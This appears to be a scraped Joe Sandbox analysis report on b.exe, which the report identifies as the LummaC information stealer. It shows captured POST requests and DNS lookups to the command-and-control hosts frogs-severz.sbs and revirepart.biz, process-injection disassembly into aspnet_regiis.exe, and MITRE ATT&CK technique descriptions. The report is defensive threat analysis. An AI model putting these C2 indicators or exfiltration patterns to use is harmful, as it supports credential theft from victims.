Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PIXVMC0RVNH46CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18146Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1EJD49M7KDWLPUQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8773Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SEPOOODGTKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20396Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=69WLIBOBDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1248Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QE9559A41CV3RM9L5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1140Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: frogs-severz.sbs

Source: C:\Users\user\Desktop\b.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0089F880
Source: C:\Users\user\Desktop\b.exe	Code function: 4x nop then mov byte ptr [eax], dl	0_2_008AF670
Source: C:\Users\user\Desktop\b.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]	0_2_0089AF10
Source: C:\Users\user\Desktop\b.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_008C4940
Source: C:\Users\user\Desktop\b.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]	0_2_008C4370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, eax	2_2_02449AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]	2_2_02449AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], dl	2_2_0244DA8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_02482B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edx], al	2_2_0246F3ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]	2_2_0246E398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edx], cl	2_2_0246EB98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]	2_2_024590D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	2_2_0244B97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5B126FE8h	2_2_024827D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]	2_2_0244AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]	2_2_02482530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, esi	2_2_0244C5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0245DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ecx+esi*8], 4F699CD4h	2_2_02483260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov di, 0008h	2_2_02444A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	2_2_0247DAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+30h]	2_2_0245E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_0245E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0246CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	2_2_0246B340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_0245EFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h	2_2_0245EFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push ebx	2_2_0244C303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_0245BB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	2_2_0245FB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_0245FB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_02466BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]	2_2_02466BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [edi]	2_2_02466BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_02466BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_0246D040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dl, EAh	2_2_02481860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_0246E06F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]	2_2_02447870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+edx*4+30h]	2_2_02447870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, eax	2_2_02442820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [eax], dl	2_2_0246D830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_0246E039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi-3E780BCDh]	2_2_0246A0D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_0246E007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	2_2_0246B0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]	2_2_0244F096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]	2_2_0244F096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, esi	2_2_024468B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], A2545BF7h	2_2_02482970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dl, EAh	2_2_02481930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_024779E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+1Ch]	2_2_0244E1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edx], di	2_2_0245FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_02465190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0244CE52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+ecx-18254539h]	2_2_0244CE52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_02466E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]	2_2_02466E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [edi]	2_2_02466E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_02466E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ecx], dl	2_2_0246DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, edi	2_2_0245F6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, ecx	2_2_0245F6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-6032535Eh]	2_2_024696F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_02466F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]	2_2_02466F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [edi]	2_2_02466F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_02466F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edx], di	2_2_0245FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then lea ecx, dword ptr [esp+00000A28h]	2_2_0244E714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_0245C7C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	2_2_0244E7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_0245EFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h	2_2_0245EFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]	2_2_0246EF87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D3h]	2_2_0245BFB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_0246D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+2C0C617Eh]	2_2_0245DD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax+00000404h]	2_2_0246FD65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, eax	2_2_0246FD65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_02466510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, ecx	2_2_02469520

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: revirepart.biz
Source: global traffic	DNS traffic detected: DNS query: frogs-severz.sbs

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report b.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_b.exe_6aed87d74fcac5fc678ad6e46e3a3777b5e2266d_f4d35178_8221b3c3-b7a5-460d-93de-9e5b89fe33c7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER95AE.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER968A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER96B9.tmp.xml

C:\Users\user\AppData\Roaming\gdi32.dll

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
b.exe

Function 6CDD6E40 Relevance: 22.3, APIs: 3, Strings: 9, Instructions: 1271
COMMON

Function 6CDE0F28 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CDE0FD8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CDE0E21 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CDE5C4D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6CDE31AD Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Function 008AF670 Relevance: 15.3, Strings: 12, Instructions: 267
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre